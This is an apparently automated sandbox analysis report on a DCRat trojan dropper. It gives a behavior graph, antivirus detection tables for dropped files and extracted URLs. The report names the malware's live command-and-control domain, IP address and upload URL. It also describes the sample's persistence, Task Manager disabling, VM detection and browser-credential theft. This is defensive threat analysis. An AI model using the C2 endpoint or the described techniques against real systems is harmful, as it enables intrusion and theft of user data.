                                Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1586066 Sample: wxl1r0lntg.exe Startdate: 08/01/2025 Architecture: WINDOWS Score: 100 125 838596cm.nyafka.top 2->125 147 Suricata IDS alerts for network traffic 2->147 149 Found malware configuration 2->149 151 Antivirus detection for dropped file 2->151 153 19 other signatures 2->153 12 wxl1r0lntg.exe 8 2->12         started        15 Everything.exe 2->15         started        18 KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe 2->18         started        20 8 other processes 2->20 signatures3 process4 dnsIp5 119 C:\Users\user\AppData\Local\...\sqls211.exe, PE32 12->119 dropped 121 C:\Users\user\AppData\Local\...\drivEn760.exe, PE32 12->121 dropped 123 C:\Users\user\AppData\...\wxl1r0lntg.exe.log, ASCII 12->123 dropped 23 sqls211.exe 3 10 12->23         started        27 drivEn760.exe 1 35 12->27         started        169 Drops executables to the windows directory (C:\Windows) and starts them 15->169 29 KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe 15->29         started        32 Everything.exe.exe 15->32         started        171 Multi AV Scanner detection for dropped file 18->171 127 127.0.0.1 unknown unknown 20->127 file6 signatures7 process8 dnsIp9 97 C:\Users\user\...\containerwebruntime.exe, PE32 23->97 dropped 99 2zt0n56bOhbwB2Kzsz...YFawepzaxIU2GKt.vbe, data 23->99 dropped 155 Multi AV Scanner detection for dropped file 23->155 34 wscript.exe 1 23->34         started        101 C:\Users\user\AppData\Local\...\Uninstall.exe, PE32 27->101 dropped 103 C:\Users\user\AppData\...verything.exe, PE32+ 27->103 dropped 111 3 other files (none is malicious) 27->111 dropped 37 Everything.exe 10 9 27->37         started        40 Everything.exe 8 27->40         started        42 Everything.exe 27->42         started        129 838596cm.nyafka.top 104.21.112.1, 49853, 49862, 49863 CLOUDFLARENETUS United States 29->129 105 C:\Users\user\Desktop\utYFHYqz.log, PE32 29->105 dropped 107 C:\Users\user\Desktop\pGGHecbL.log, PE32 29->107 dropped 109 C:\Users\user\Desktop\fXnruzVd.log, PE32 29->109 dropped 113 3 other malicious files 29->113 dropped 157 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 29->157 159 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 29->159 161 Tries to harvest and steal browser information (history, passwords, etc) 29->161 file10 signatures11 process12 file13 131 Windows Scripting host queries suspicious COM object (likely to drop second stage) 34->131 133 Suspicious execution chain found 34->133 44 cmd.exe 34->44         started        93 C:\Program Filesverything\Uninstall.exe, PE32 37->93 dropped 95 C:\Program Filesverythingverything.exe, PE32 37->95 dropped 46 Everything.exe 21 4 37->46         started        signatures14 process15 signatures16 49 containerwebruntime.exe 44->49         started        53 reg.exe 44->53         started        55 conhost.exe 44->55         started        167 Creates multiple autostart registry keys 46->167 process17 file18 85 C:\Windows\apppatch\CustomSDB\sihost.exe, PE32 49->85 dropped 87 C:\...\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe, PE32 49->87 dropped 89 C:\...\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe, PE32 49->89 dropped 91 11 other malicious files 49->91 dropped 135 Multi AV Scanner detection for dropped file 49->135 137 Creates an undocumented autostart registry key 49->137 139 Creates multiple autostart registry keys 49->139 145 2 other signatures 49->145 57 csc.exe 49->57         started        61 csc.exe 49->61         started        63 powershell.exe 49->63         started        65 19 other processes 49->65 141 Disable Task Manager(disabletaskmgr) 53->141 143 Disables the Windows task manager (taskmgr) 53->143 signatures19 process20 file21 115 C:\Program Files (x86)\...\msedge.exe, PE32 57->115 dropped 163 Infects executable files (exe, dll, sys, html) 57->163 67 conhost.exe 57->67         started        69 cvtres.exe 57->69         started        117 C:\Windows\...\SecurityHealthSystray.exe, PE32 61->117 dropped 71 conhost.exe 61->71         started        73 cvtres.exe 61->73         started        165 Loading BitLocker PowerShell Module 63->165 75 conhost.exe 63->75         started        77 WmiPrvSE.exe 63->77         started        79 conhost.exe 65->79         started        81 cvtres.exe 65->81         started        83 21 other processes 65->83 signatures22 process23

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand
                                SourceDetectionScannerLabelLink
                                wxl1r0lntg.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                wxl1r0lntg.exe100%AviraTR/Dropper.Gen
                                wxl1r0lntg.exe100%Joe Sandbox ML
                                SourceDetectionScannerLabelLink
                                C:\Recovery\RuntimeBroker.exe100%AviraHEUR/AGEN.1323342
                                C:\Program Files\Everything\Everything.exe100%AviraHEUR/AGEN.1357628
                                C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe100%AviraHEUR/AGEN.1323342
                                C:\Users\user\AppData\Local\Temp\KDhudFNWvk.bat100%AviraBAT/Delbat.C
                                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe100%Joe Sandbox ML
                                C:\Recovery\RuntimeBroker.exe100%Joe Sandbox ML
                                C:\Program Files\Everything\Everything.exe100%Joe Sandbox ML
                                C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe100%Joe Sandbox ML
                                C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Program Files\Everything\Uninstall.exe0%ReversingLabs
                                C:\Recovery\RuntimeBroker.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\AppData\Local\Temp\drivEn760.exe0%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exe0%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Uninstall.exe0%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\nss476A.tmp\InstallOptions.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\nss476A.tmp\LangDLL.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\nss476A.tmp\System.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\sqls211.exe68%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\ANcNpKUT.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\GEAmOcnc.log25%ReversingLabs
                                C:\Users\user\Desktop\TDoLDJFD.log8%ReversingLabs
                                C:\Users\user\Desktop\WteBKGGw.log5%ReversingLabs
                                C:\Users\user\Desktop\dFyrOIJL.log8%ReversingLabs
                                C:\Users\user\Desktop\fXnruzVd.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\hwphVFJE.log5%ReversingLabs
                                C:\Users\user\Desktop\otdhyUEt.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                C:\Users\user\Desktop\pGGHecbL.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\phhpjhAr.log25%ReversingLabs
                                C:\Users\user\Desktop\qeIxFhOl.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\utYFHYqz.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Windows\apppatch\CustomSDB\sihost.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                No Antivirus matches
                                No Antivirus matches
                                No Antivirus matches
                                NameIPActiveMaliciousAntivirus DetectionReputation
                                838596cm.nyafka.top
                                104.21.112.1
                                truetrue
                                  NameMaliciousAntivirus DetectionReputation
                                  http://838596cm.nyafka.top/lineLongpolllinuxFlowercentraluploads.phptrue
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://www.voidtools.com/downloads/https://www.voidtools.com/downloads/#languagehttps://www.voidtoodrivEn760.exe, 00000003.00000002.2322582469.0000000002726000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2221996305.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmp, Everything.exe, 00000006.00000000.2219670131.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmp, Everything.exe, 00000007.00000000.2224034477.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 00000007.00000002.2228700188.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 00000008.00000000.2226818799.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 0000000A.00000002.2246706702.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 0000000A.00000000.2244353758.00007FF728D60000.00000002.00000001.01000000.00000010.sdmpfalse
                                      http://support.voidtools.com/everything/Command_line_options/Everything.exe, 00000006.00000003.2222673709.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2222133131.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2229536980.0000000000B77000.00000004.00000020.00020000.00000000.sdmpfalse
                                        https://www.voidtools.com/downloads/#languagedrivEn760.exe, 00000003.00000002.2322582469.0000000002726000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2221996305.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2222077239.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2229925355.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmp, Everything.exe, 00000006.00000003.2229823075.0000000000B7C000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2229585702.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2229536980.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000000.2219670131.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmp, Everything.exe, 00000006.00000003.2221177245.0000000000B8B000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000007.00000000.2224034477.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 00000007.00000002.2228700188.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 00000008.00000000.2226818799.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 0000000A.00000002.2246706702.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 0000000A.00000003.2245528465.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 0000000A.00000000.2244353758.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 0000000A.00000003.2245716930.0000000000CDD000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 0000000A.00000003.2245320628.0000000000CD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000039.00000002.2828823825.0000020D427D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000039.00000002.2828823825.0000020D427D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000039.00000002.2828823825.0000020D427D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                https://www.voidtools.com/donate/drivEn760.exe, 00000003.00000002.2322582469.0000000002726000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2221996305.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2229823075.0000000000B99000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2222077239.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmp, Everything.exe, 00000006.00000003.2229506743.0000000000B95000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000000.2219670131.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmp, Everything.exe, 00000006.00000002.2241116739.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2221177245.0000000000B8B000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000007.00000000.2224034477.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 00000007.00000002.2228700188.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 00000008.00000000.2226818799.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 0000000A.00000002.2246706702.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 0000000A.00000003.2245528465.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 0000000A.00000000.2244353758.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 0000000A.00000003.2245744219.0000000000CE4000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 0000000A.00000003.2245716930.0000000000CDD000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 0000000A.00000003.2245791189.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 0000000A.00000003.2245938206.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 0000000A.00000003.2245320628.0000000000CD3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 0000000A.00000002.2246288546.0000000000CEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  http://www.voidtools.com/everything/update.iniVEverything.exe, 0000000A.00000003.2245528465.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 0000000A.00000003.2245716930.0000000000CDD000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 0000000A.00000003.2245320628.0000000000CD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    http://support.voidtools.com/everything/Search_commandsEverything.exe, 00000006.00000003.2222077239.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2229925355.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2229823075.0000000000B7C000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2229585702.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2229536980.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2221177245.0000000000B8B000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 0000000A.00000003.2245528465.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 0000000A.00000003.2245716930.0000000000CDD000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 0000000A.00000003.2245320628.0000000000CD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      https://www.voidtools.com/downloads/#language2PEverything.exe, 00000006.00000003.2222077239.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2229925355.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2229823075.0000000000B7C000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2229585702.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2229536980.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2221177245.0000000000B8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        http://nsis.sf.net/NSIS_ErrorErrorwxl1r0lntg.exe, 00000000.00000002.2052298255.00000000145C9000.00000004.00000800.00020000.00000000.sdmp, drivEn760.exe, 00000003.00000003.2219049528.0000000005141000.00000004.00000020.00020000.00000000.sdmp, drivEn760.exe, 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, drivEn760.exe, 00000003.00000000.2038693989.000000000040A000.00000008.00000001.01000000.0000000A.sdmp, Everything.exe, 00000006.00000003.2229006860.0000000000BA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          https://www.voidtools.com/downloads/drivEn760.exe, 00000003.00000002.2322582469.0000000002726000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2221996305.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2222673709.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmp, Everything.exe, 00000006.00000003.2222133131.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000002.2240665516.0000000000B7C000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2229823075.0000000000B7C000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2229585702.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2229536980.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000000.2219670131.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmp, Everything.exe, 00000007.00000000.2224034477.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 00000007.00000002.2228700188.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 00000008.00000000.2226818799.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 0000000A.00000002.2246706702.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 0000000A.00000003.2245528465.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 0000000A.00000000.2244353758.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 0000000A.00000003.2245716930.0000000000CDD000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 0000000A.00000003.2245320628.0000000000CD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            http://support.voidtools.com/everything/Search_syntaxEverything.exe, 00000006.00000003.2222077239.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2229925355.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2229823075.0000000000B7C000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2229585702.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2229536980.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2221177245.0000000000B8B000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 0000000A.00000003.2245528465.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 0000000A.00000003.2245716930.0000000000CDD000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 0000000A.00000003.2245320628.0000000000CD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              https://github.com/Pester/Pesterpowershell.exe, 00000039.00000002.2828823825.0000020D427D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                http://www.voidtools.com/everything/beta-update.inidrivEn760.exe, 00000003.00000002.2322582469.0000000002726000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2221996305.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmp, Everything.exe, 00000006.00000000.2219670131.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmp, Everything.exe, 00000007.00000000.2224034477.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 00000007.00000002.2228700188.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 00000008.00000000.2226818799.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 0000000A.00000002.2246706702.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 0000000A.00000000.2244353758.00007FF728D60000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                  http://www.voidtools.com/everything/update.ini&PEverything.exe, 00000006.00000003.2222077239.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2229925355.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2229823075.0000000000B7C000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2229585702.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2229536980.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2221177245.0000000000B8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    https://www.voidtools.com/downloads/nEverything.exe, 0000000A.00000003.2245528465.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 0000000A.00000003.2245716930.0000000000CDD000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 0000000A.00000003.2245320628.0000000000CD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      https://www.voidtools.com/support/everything/drivEn760.exe, 00000003.00000002.2322582469.0000000002726000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2221996305.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2222077239.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2229925355.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmp, Everything.exe, 00000006.00000003.2229823075.0000000000B7C000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2229585702.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2229536980.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000000.2219670131.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmp, Everything.exe, 00000006.00000003.2221177245.0000000000B8B000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000007.00000000.2224034477.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 00000007.00000002.2228700188.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 00000008.00000000.2226818799.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 0000000A.00000002.2246706702.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 0000000A.00000003.2245528465.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 0000000A.00000000.2244353758.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 0000000A.00000003.2245716930.0000000000CDD000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 0000000A.00000003.2245320628.0000000000CD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        http://support.voidtools.com/everything/Command_line_optionsREverything.exe, 0000000A.00000003.2245768952.0000000000CDA000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 0000000A.00000003.2245528465.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 0000000A.00000003.2245830909.0000000000CDB000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 0000000A.00000003.2245320628.0000000000CD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          https://www.voidtools.com/CEverything.exe, 0000000A.00000003.2245528465.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 0000000A.00000003.2245716930.0000000000CDD000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 0000000A.00000003.2245320628.0000000000CD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            https://www.voidtools.com/support/everything/http://www.voidtools.com/everything/update.iniwww.voidtdrivEn760.exe, 00000003.00000002.2322582469.0000000002726000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2221996305.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmp, Everything.exe, 00000006.00000000.2219670131.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmp, Everything.exe, 00000007.00000000.2224034477.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 00000007.00000002.2228700188.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 00000008.00000000.2226818799.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 0000000A.00000002.2246706702.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 0000000A.00000000.2244353758.00007FF728D60000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                              https://www.voidtools.com/drivEn760.exe, 00000003.00000002.2322582469.0000000002726000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2221996305.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2222673709.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmp, Everything.exe, 00000006.00000003.2222133131.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2229585702.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2229536980.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000000.2219670131.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmp, Everything.exe, 00000007.00000000.2224034477.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 00000007.00000002.2228700188.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 00000008.00000000.2226818799.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 0000000A.00000002.2246706702.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 0000000A.00000003.2245528465.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 0000000A.00000000.2244353758.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 0000000A.00000003.2245716930.0000000000CDD000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 0000000A.00000003.2245320628.0000000000CD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                https://www.voidtools.com/donate/HelpdrivEn760.exe, 00000003.00000002.2322582469.0000000002726000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2221996305.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmp, Everything.exe, 00000006.00000000.2219670131.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmp, Everything.exe, 00000007.00000000.2224034477.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 00000007.00000002.2228700188.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 00000008.00000000.2226818799.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 0000000A.00000002.2246706702.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 0000000A.00000000.2244353758.00007FF728D60000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                  https://www.voidtools.com/update/)drivEn760.exe, 00000003.00000002.2322582469.0000000002726000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2221996305.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmp, Everything.exe, 00000006.00000000.2219670131.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmp, Everything.exe, 00000007.00000000.2224034477.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 00000007.00000002.2228700188.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 00000008.00000000.2226818799.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 0000000A.00000002.2246706702.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 0000000A.00000000.2244353758.00007FF728D60000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000039.00000002.2828823825.0000020D427D1000.00000004.00000800.00020000.00000000.sdmpfalse
